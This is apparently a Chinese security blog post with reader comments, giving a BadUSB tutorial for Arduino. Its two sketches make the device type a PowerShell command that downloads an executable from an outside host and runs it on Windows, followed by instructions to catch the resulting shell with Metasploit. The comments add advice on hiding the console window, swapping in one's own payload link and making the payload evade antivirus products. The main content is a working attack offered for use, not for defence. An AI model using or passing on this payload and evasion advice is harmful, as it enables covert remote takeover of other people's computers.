准备
- badusb
Arduino
下载软件
运行软件
在工具
菜单中 选择,选择badusb的端口
和开发版
。
注入代码
windows10系统
#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(1000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://bbskali.cn/8888.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file);%HOMEPATH%\\windows.exe;");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
}
void loop()//循环
{
}
windows7系统
#include <Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.println("CMD.EXE /t:01 /k MODE con: cols=16 lines=2");
delay(1000);
Keyboard.println("POWERSHELL -cOMMAND $CLNT = NEW-OBJECT sYSTEM.nET.wEBcLIENT;$URL= 'https://bbskali.cn/8888.exe';$FILE = ' c:\\X.EXE ';$CLNT.dOWNLOADfILE($URL,$FILE);");
delay(3000);
Keyboard.println("C:\\X.EXE&EXIT");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
其他代码
传送门
编译上传
成功如下:
配置监听
在msf中我们配置参数,插入badusb即可得到shell,需要注意的是,本代码仅支持win10对于win7和xp由于不能直接用powershell
下载,所以以上代码不能实现。
39 comments
请问下博主,你的网站页面是怎么调整宽度的呀,我的背景图片就显示不了这么大呀。
这个和你图片的大小有关吧,再次设置图片宽度为100% 高度为 auto 即可!
博主你好,请问badusb如何在运行完指令后自动关闭cmd
kill掉,或者start /min xxx.exe最小化运行,exit退出,常用于最后!
不能关闭,只能等命令完成了自动关闭,或者影藏最小!
大佬想知道现在有没有更好地制作免杀exe的方法 以前那些火绒都会直接拦截OωO
有的,在论坛里面有教程!bbskali.cn
谢谢 还有一个问题就是 开启大写之后 后面的所有命令都需要 相反这来写吗?(就是小写变大写) 如果已经解析了域名,那网址下载时的 http://、包括文件名,这些也需要大写吗?
和系统有关,Windows下不需要,但是Linux需要注意大小写。
这个如果是自己的badusb里面的代码,下载了你的8888.exe那么能不能反弹到自己的msf中啊
代码不变,把里面shell的链接换成你的即可!
这个shell就是msf生成的,那么不过查杀,下载了自动运行杀软不会报毒吗?
对msf生成的shell进行免杀即可,只要你的shell免杀,自动运行是不报毒的。
有什么好的免杀方法能让shell过360的检测啊,我之前用的几种免杀方式都只能过很少量的杀软?
你在论坛和博客中找下相关的文章,我写过!
能不能加一下您的微信或者qq啊,方便交流,我之前尝试了您写的免杀教程,但是好像360的过不了诶,不知道是不是我做的有点问题,您是用的什么工具呢?
914101530
1111111
这个现在打补丁就不行了吧?顺便过来看看邻居
手机上能不能搞,手机处理器比ardino厉害吧
手机可以搞,要有内核支持才行,比如一加和谷歌亲儿子支持的Kali NetHunter就可以
不行!
不错
这个是用来记录键盘的功能?
没有,配合msfconsole拿shell
您好,请问您的这个代码高亮是怎么整的啊
参考文章:https://github.com/Xcnte/ColorHighlight-for-typecho/blob/master/README.md
互换友情链接吗www.hacklaohei.com
名称:kali博客
网址:https://blog.bbskali.cn
头像:https://blog.bbskali.cn/logo.png
介绍:kali博客,致力于网络安全。
能出几个视频吗?
滴!访客卡!请上车的乘客系好安全带,现在是:Wed Jul 17 2019 18:22:20 GMT+0800 (中国标准时间)
博主,你的博客是加了cdn吗,还是放在了服务器上啊
阿里云CDN
大家好不说是吧你说呢
你高兴就好!?
badusb设备你这边可以买吗? ???
联系下管理员
可以!
你好,我问下这个需要买怎样的badusb,有没有其他的要求呢?